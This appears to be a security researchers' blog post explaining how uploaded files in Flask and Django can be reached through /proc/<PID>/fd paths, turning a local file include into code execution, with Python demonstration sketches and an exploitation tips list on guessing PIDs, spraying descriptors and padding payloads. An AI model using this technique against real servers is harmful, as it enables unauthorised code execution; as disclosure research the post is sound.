Have you ever been testing a web application for vulnerabilities, found a local file include (LFI) that could pay serious dividends if only the right file were on the web server, but couldn’t find that file to save your life? If so, and you’ve still got access to that application, you may want to revisit it after reading this.

tl;dr – we’ve found a way to turn local file include (LFI) into remote file include (RFI) for a number of web frameworks

My good friend Mike Brooks (aka rook) and I have been assessing some open source software, and we found an avenue for code execution that relied upon having a JAR file of our choosing residing on the web server (we’ll have a full write-up of the results of our assessment once CVEs and patches are out). When configured in a specific way, the web application would load the JAR file and search within it for a class. Interestingly enough, a Java class can define a static initializer block that is executed when the class is initialized, as shown below:

Compiling and loading this Java class is shown below:

Executing code on class load in Java

With the ability to get code to run upon the JAR file being loaded, and the ability to point the web server to a file path to load a JAR, we thought we had this in the bag – all we had to find now was a way to get the application to reference the JAR somehow.

And so we looked and we looked. We looked at all of the request handlers within the application for file uploads. We looked at other network services on the same box. We looked for ways that we could poison files on the server to potentially turn them into the JAR. And after all of this looking we came up empty-handed.

Mike, being the stubborn exploit extraordinaire that he is, wasn’t ready to give up. I wasn’t entirely ready myself, so we dug in deeper. It was at that point that Mike came up with a great idea…

File Descriptors

Sure, most frameworks take files that are uploaded and place them on the server’s disk at a path that isn’t guessable (typically using a GUID or other random identifier of some kind), but what if you didn’t need to know that file path to still reference the uploaded file?

On Linux, every file that a process has open shows up as an entry in that process’s /proc/<PID>/fd/ directory, named after the file descriptor number and pointing to the file in question. So, if we have a process with a PID of 1234, and that process has an open file handle to some file in a random location on disk, that file can be accessed through one of the file descriptors in /proc/1234/fd/*. This means that instead of having to guess GUIDs or other random values, you need only guess (or find through other means of information disclosure) the PID of an HTTP request’s handler and the file descriptor number of the uploaded file. This is a drastic reduction in the search space for referencing an uploaded file. Not only that, but if you already have LFI, there are often files in predictable places on disk that contain the PID of the web server handling HTTP requests.
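
To make the /proc trick concrete, here is a minimal Python sketch (Linux only). It opens a temporary file at an unpredictable path and then reads the same bytes back using nothing but the process ID and the descriptor number. The helper names read_via_proc_fd and demo are ours, purely for illustration, and are not part of any framework.

```python
import os
import tempfile


def read_via_proc_fd(pid: int, fd: int) -> bytes:
    """Read a file through /proc/<pid>/fd/<fd> without knowing its real path."""
    with open(f"/proc/{pid}/fd/{fd}", "rb") as handle:
        return handle.read()


def demo() -> bytes:
    # NamedTemporaryFile picks a random name, standing in for an upload
    # that a framework stored at an unguessable location.
    with tempfile.NamedTemporaryFile() as upload:
        upload.write(b"Hello World!\n")
        upload.flush()
        # Only the PID and the descriptor number are needed from here on.
        return read_via_proc_fd(os.getpid(), upload.fileno())


if __name__ == "__main__":
    print(demo())
```

Keep in mind that reading another process’s descriptors generally requires running as the same user as that process (or as root), which is usually the case when the LFI lives inside the web server itself.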

Now this may not seem all that important so far, so allow me to invoke the late, great Billy Mays real quick…

But Wait There's More

Lazily Loaded File Descriptors

At this point you may be thinking “ok sure, you have reduced the amount of entropy that you have to grapple with to get an LFI working – so what?” You might also be thinking that in order to make use of this functionality you’d need to find a request handler that accepts file uploads, and hammer away at that endpoint uploading files while attempting to LFI all the PID file descriptors.

This is only partly true – in the frameworks that we have tested, file descriptors are lazily loaded when the FILES dictionary is accessed, and with Flask in particular this FILES dictionary is populated even on HTTP GET requests. Take the following super simple Flask app for example:

In this app we have a single handler, mounted at the base URL, that allows HTTP GET requests. Let’s run this app in an Ubuntu VM, upload a file to it, and see what we can find. Even better – let’s upload a file via an HTTP GET request. For anyone who hasn’t seen the import code trick before, this is a great way to debug Python code and libraries – you’re dropped into a REPL at the code.interact call!

Here’s a simple script for uploading a file via an HTTP GET request:
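
The original listing is not reproduced here, so what follows is a minimal standard-library sketch of the idea rather than the script we actually ran. It builds a multipart/form-data body by hand and attaches it to a GET request. The function names and the form field name "file" are assumptions made for illustration.

```python
import urllib.request
import uuid
from typing import Tuple


def build_multipart(field: str, filename: str, payload: bytes) -> Tuple[bytes, str]:
    """Return (body, content_type) for a single-file multipart/form-data upload."""
    boundary = uuid.uuid4().hex
    disposition = f'Content-Disposition: form-data; name="{field}"; filename="{filename}"\r\n'
    body = b"".join([
        f"--{boundary}\r\n".encode(),
        disposition.encode(),
        b"Content-Type: application/octet-stream\r\n\r\n",
        payload,
        f"\r\n--{boundary}--\r\n".encode(),
    ])
    return body, f"multipart/form-data; boundary={boundary}"


def build_get_upload(url: str, path: str) -> urllib.request.Request:
    """Build (but do not send) a GET request whose body carries a file upload."""
    with open(path, "rb") as handle:
        body, content_type = build_multipart("file", "hullo", handle.read())
    # urllib would default to POST once data is set, so the method is forced to GET.
    return urllib.request.Request(
        url, data=body, headers={"Content-Type": content_type}, method="GET"
    )
```

Sending it would look like urllib.request.urlopen(build_get_upload("http://127.0.0.1:5000/", "/tmp/hullo")), where the URL is an assumed local development server address.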

And looking in the file at /tmp/hullo we see lots and lots of lines with the words “Hello World”:

Hello World!
Hello World!

We then run the server and upload the file, which drops us into a REPL within the context of the Flask request handler:

The PID of the Flask request handler

With the PID of the request handler we can take a look at the open file descriptors on disk:

File descriptors before lazily loading uploaded file

We then go back to the REPL and access the uploaded file:

Lazily loading uploaded file contents

Now that the file has been accessed from within the web server, let’s go back to the /proc directory and see if we can find the contents of the uploaded file (which is pointed to by file descriptor 5 as per the information above):

File descriptor after lazy loading

Sure enough – there is our uploaded file! For the application we were assessing, we confirmed that this method of uploading and referencing a file worked just fine for the JAR we wanted to run!

We can further reduce the entropy of the file location search space by uploading the same file multiple times. For example, I modified the upload script to submit nine copies of the same file:

After running this script, accessing the FILES dictionary in the handler, and checking the contents of the fd directory within the request handler’s PID, we see that there are open file descriptors for all nine of the uploaded files:

Nine distinct file descriptors for the same uploaded file
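
The same effect can be reproduced outside of any web framework. The sketch below (Linux only) holds several copies of one payload open at once and then reads each copy back through /proc/self/fd. The function name spray_descriptors is hypothetical, and the temporary files merely stand in for what a framework does with uploads.

```python
import tempfile
from typing import Dict


def spray_descriptors(payload: bytes, copies: int) -> Dict[int, bytes]:
    """Hold `copies` temp files open and map each fd number to what /proc exposes."""
    handles = []
    try:
        for _ in range(copies):
            handle = tempfile.TemporaryFile()
            handle.write(payload)
            handle.flush()
            handles.append(handle)
        seen = {}
        for handle in handles:
            fd = handle.fileno()
            # Each descriptor is its own doorway to the same payload.
            with open(f"/proc/self/fd/{fd}", "rb") as view:
                seen[fd] = view.read()
        return seen
    finally:
        for handle in handles:
            handle.close()


if __name__ == "__main__":
    for fd, data in sorted(spray_descriptors(b"Hello World!\n", 9).items()):
        print(fd, data)
```

The descriptor numbers will typically be allocated one after another, although the exact values depend on what else the process already has open.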

With this approach you can likely guarantee that a file descriptor with a specific number is going to point to your uploaded file. Imagine submitting this request with 100 files instead – chances are file descriptor 50 is your file! In turn, this makes it so that the only value you need to guess is the PID, which is not very random at all.
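
As a rough sketch of how small the remaining search space becomes, the generator below enumerates candidate paths for a range of PIDs and descriptor numbers. The function name and the ranges in the usage note are made-up values for illustration; real ranges would come from studying a local copy of the target.

```python
from itertools import product
from typing import Iterator


def candidate_fd_paths(pids: range, fds: range) -> Iterator[str]:
    """Yield every /proc/<pid>/fd/<fd> path for the given PID and fd ranges."""
    for pid, fd in product(pids, fds):
        yield f"/proc/{pid}/fd/{fd}"


if __name__ == "__main__":
    # One pinned descriptor number across a thousand PIDs is only a thousand guesses.
    paths = list(candidate_fd_paths(range(1000, 2000), range(50, 51)))
    print(len(paths), paths[0], paths[-1])
```

With the descriptor number pinned by uploading many copies, candidate_fd_paths(range(1000, 2000), range(50, 51)) yields just 1,000 paths to try, compared with the effectively unguessable space of a random GUID.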

Considerations for Exploitation

In summary, this is a method to greatly reduce the search space necessary to reference uploaded files for exploitation purposes, which in turn enables LFI to become RFI in many cases. If you’re looking to use this method for exploitation, consider the following:

  • The frameworks that we have looked at (Django and Flask) lazily load file references when the FILES dictionaries are accessed. As such, you must target request handlers that access the FILES dictionary. Once the FILES dictionary is accessed, the file descriptor will remain open for the duration of the request handling.
  • Other frameworks may just populate these file descriptors by default – this is something we’re going to look into more.
  • Some frameworks make no distinction between different request methods when processing an uploaded file in the body of a request (cough cough FLASK cough cough), meaning that this attack is not limited to non-idempotent HTTP verbs.
  • PIDs are not meant to be randomized. If you’re looking to turn this into an exploit, create a local setup of whatever your target is (Apache on Ubuntu, Nginx on Fedora, etc.) and take a look at the PIDs associated with the web servers and request handlers. Generally speaking, services installed on *nix are started in a similar order on every boot. As PIDs are assigned sequentially as well, this means that you can drastically reduce the PID search space.
  • The request handler only has to access the FILES dictionary for all uploaded files to be processed. This is to say that if functionality within a handler expects an uploaded file to be a PDF in order for the request handler’s code to be executed and you want to upload a JAR, then just upload both files – they will both be given file descriptors.
  • Try to find request handlers that (1) load the file descriptors and (2) take a significant amount of time to do whatever they’re intended to do. For the purpose of our assessment, we found a handler that was meant to process the entire contents of a file row by row, so we uploaded a huge file to it alongside the JAR we wanted to execute.
  • Note that if the file you’re uploading is small, it may just be read into memory and no file descriptor will be opened. When testing against Flask, we found that files under 1MB were loaded straight into memory whereas files over 1MB were placed on disk and fdopen’ed. As such, you may need to pad out any exploit payloads accordingly.
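
The last point can be illustrated with Python’s own tempfile.SpooledTemporaryFile, which keeps data in memory until it grows past max_size and only then moves it into a real file. Whether a given framework uses this class, and with what threshold, is an assumption you should verify against the version you are targeting. The helper name lands_on_disk is ours.

```python
import io
import tempfile


def lands_on_disk(payload_size: int, max_size: int) -> bool:
    """Return True if a payload of this size is spilled from memory to a real file."""
    with tempfile.SpooledTemporaryFile(max_size=max_size) as spool:
        spool.write(b"A" * payload_size)
        # _file is documented: an in-memory buffer until rollover, a true file after.
        return not isinstance(spool._file, io.BytesIO)


if __name__ == "__main__":
    threshold = 1024 * 1024  # assumed threshold, mirroring the roughly 1MB we observed
    print(lands_on_disk(10, threshold))             # small payload stays in memory
    print(lands_on_disk(threshold + 1, threshold))  # padded payload is written to disk
```

In other words, padding a payload just past the threshold is what makes a file descriptor appear for it at all.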

And that’s all for now. We’ve got a lot more digging to do with this issue and have had a lot of fun assessing the software in which we discovered it, so stay tuned for more shenanigans.

**UPDATE**

After mulling it over some more, I was wondering why the frameworks we looked at were lazily loading the file descriptors. Surely it wouldn’t make sense to parse the whole contents of an HTTP request body once to get the POST parameters and a second time to get the contents of uploaded files, right??

Sure enough, for both Flask and Django it’s not that the FILES are lazily loaded – it’s that the contents of the request body aren’t processed until accessed. As such, with this attack you can target any request handler that accesses data stored in the request body. As soon as the data contained within the body is accessed, the file descriptors will be populated.
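
A toy model of that behavior is sketched below. It is not Flask’s or Django’s actual code, and the class and attribute names are invented for illustration. The point is only that no file descriptor exists until something touches the body for the first time.

```python
import tempfile


class LazyBodyRequest:
    """Toy request object: the body is only parsed (and spooled) on first access."""

    def __init__(self, raw_body: bytes):
        self._raw_body = raw_body
        self._spooled = None  # no descriptor exists until something asks for the body

    @property
    def descriptor_open(self) -> bool:
        return self._spooled is not None

    @property
    def body_file(self):
        # First access does the work: write the body to a temp file and keep it open.
        if self._spooled is None:
            self._spooled = tempfile.TemporaryFile()
            self._spooled.write(self._raw_body)
            self._spooled.seek(0)
        return self._spooled

    def close(self) -> None:
        # End of request handling: the descriptor goes away again.
        if self._spooled is not None:
            self._spooled.close()
            self._spooled = None
```

A handler that never reads the body never opens a descriptor, while one that reads it holds the descriptor open until close() runs at the end of the request.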

Accessing the contents of a request body in Django is shown below:

Accessing request body in Django

The file descriptor being populated through this access is shown below:

File descriptor populated through accessing Django request body

Accessing the contents of a request body in Flask is shown below:

Accessing the contents of a request body in Flask

The file descriptor being populated through this access is shown below:

File descriptor populated through Flask body access

Woot.